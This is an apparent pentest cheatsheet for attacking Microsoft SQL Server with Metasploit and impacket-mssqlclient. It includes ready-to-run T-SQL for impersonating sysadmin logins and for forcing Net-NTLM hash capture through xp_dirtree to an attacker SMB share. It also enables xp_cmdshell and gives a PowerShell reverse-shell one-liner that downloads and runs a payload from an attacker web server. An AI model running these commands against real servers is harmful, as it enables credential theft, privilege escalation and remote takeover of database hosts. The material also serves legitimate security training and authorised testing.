SQL Server

Microsoft SQL Server

# Discovery

Searching for MSSQL instances inside the internal network can be done with UDP footprinting. A SQL Server instance listens either on TCP port 1433 (the default instance) or on a dynamically assigned TCP port (typical for named instances). When the port is dynamic, querying the SQL Server Browser service on UDP port 1434 returns information about the instances on that host, including the TCP port each one is listening on:

msf > use auxiliary/scanner/mssql/mssql_ping

# Default Databases:

Every SQL Server instance has a number of default system databases:

- master - holds instance-wide information (logins, linked servers, configuration) for the SQL Server instance.
- msdb - used by SQL Server Agent (jobs, alerts, backup history).
- model - template database copied for every newly created database.
- resource - read-only, hidden database that holds the system objects which appear in the sys schema of every database on the server.
- tempdb - holds temporary objects created by queries; recreated every time the service starts.

# impacket-mssqlclient command cheatsheet

- DB list: SELECT name FROM master.dbo.sysdatabases
- Capture the service account's Net-NTLM hash (forces the SQL Server service account to authenticate to an attacker-controlled SMB share, caught with Responder or impacket-smbserver): exec xp_dirtree '\\10.10.14.5\SHARE'
- Execute commands: the login should be a member of the sysadmin fixed server role. Check with select IS_SRVROLEMEMBER('sysadmin'); (1 = member, 0 = not a member).
- If the current login is not sysadmin but is allowed to impersonate one, switch context with EXECUTE AS LOGIN: https://docs.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16
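The enumeration and impersonation flow from the cheatsheet above, as an added worked example (not from the original page). It assumes a low-privileged login that has been granted IMPERSONATE on 'sa'; the login names and the attacker share 10.10.14.5\SHARE are illustrative.

```sql
-- Added example, not from the original page. Assumes the current login may impersonate 'sa';
-- names and the share path are illustrative.

-- 1. Who am I, and am I already sysadmin? (1 = yes, 0 = no, NULL = unknown login)
SELECT SYSTEM_USER AS login_name,
       USER_NAME()  AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Which logins is the current login allowed to impersonate?
--    The grantor of an IMPERSONATE permission is the login that can be impersonated.
SELECT DISTINCT b.name AS impersonable_login
FROM sys.server_permissions a
JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

-- 3. Switch the execution context to the impersonable login, re-check, then REVERT.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- expect 1 if 'sa' is sysadmin
REVERT;

-- 4. Force the SQL Server service account to authenticate to an attacker SMB share
--    (capture the Net-NTLM hash with Responder or impacket-smbserver on 10.10.14.5).
--    xp_dirtree is callable by ordinary logins in a default install, so this does not
--    need sysadmin; the returned rows are irrelevant, the outbound SMB auth is the point.
EXEC master.sys.xp_dirtree '\\10.10.14.5\SHARE', 1, 1;
```

Step 2 is the query to run first: if it returns a sysadmin login, step 3 gives you that role for the rest of the session without touching any configuration. Recent impacket releases expose the same steps as the mssqlclient built-ins enum_impersonate and exec_as_login.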

# Command Execution

- xp_cmdshell is a very powerful feature and is disabled by default. It can be enabled and disabled with Policy-Based Management or by executing sp_configure (which requires the ALTER SETTINGS server permission, held implicitly by sysadmin and serveradmin).
- When called by a member of the sysadmin fixed server role, xp_cmdshell runs the Windows command under the security context of the SQL Server service account.
- When called by a login that is not a member of the sysadmin fixed server role, xp_cmdshell connects to Windows with the account name and password stored in the credential named ##xp_cmdshell_proxy_account##. If this proxy credential does not exist, the call fails.
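Enabling xp_cmdshell with sp_configure and, for the non-sysadmin case described above, creating the proxy credential, as an added worked example (not from the original page). It assumes a sysadmin session; the Windows account CORP\svc_lowpriv, its password and the database user lowpriv_user are placeholders.

```sql
-- Added example, not from the original page. Run as a sysadmin login.
-- Account names and the password below are placeholders.

-- 1. Show the current state (config_value / run_value 1 = enabled, 0 = disabled).
--    'show advanced options' must be on before xp_cmdshell can be changed.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell';

-- 2. Enable it and confirm which Windows account commands run under
--    (for a sysadmin caller this is the SQL Server service account).
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC master.sys.xp_cmdshell 'whoami';

-- 3. Optional: let a non-sysadmin login use xp_cmdshell. Its commands run as the
--    proxy credential ##xp_cmdshell_proxy_account##, which this procedure creates;
--    without it, calls from non-sysadmin logins fail.
EXEC sp_xp_cmdshell_proxy_account 'CORP\svc_lowpriv', 'P@ssw0rd!';
USE master;
GRANT EXECUTE ON xp_cmdshell TO [lowpriv_user];   -- user mapped in master for that login

-- 4. Leave the server as found when the engagement step is done.
EXEC sp_xp_cmdshell_proxy_account NULL;            -- drops the proxy credential
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

The 'whoami' output in step 2 tells you immediately whether you are running as a domain service account, which decides how useful the foothold is beyond the database host.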

# Reverse shell using impacket-mssqlclient (observe how the double quotes are escaped)

Requires xp_cmdshell to be enabled and the PowerShell payload ivs.ps1 to be served from the attacker's web server (here 10.10.14.18:8000); the script downloaded this way is what opens the reverse shell. Note the backslash-escaped double quotes around the URL:

xp_cmdshell powershell iex(New-Object Net.WebClient).DownloadString(\"http://10.10.14.18:8000/ivs.ps1\")
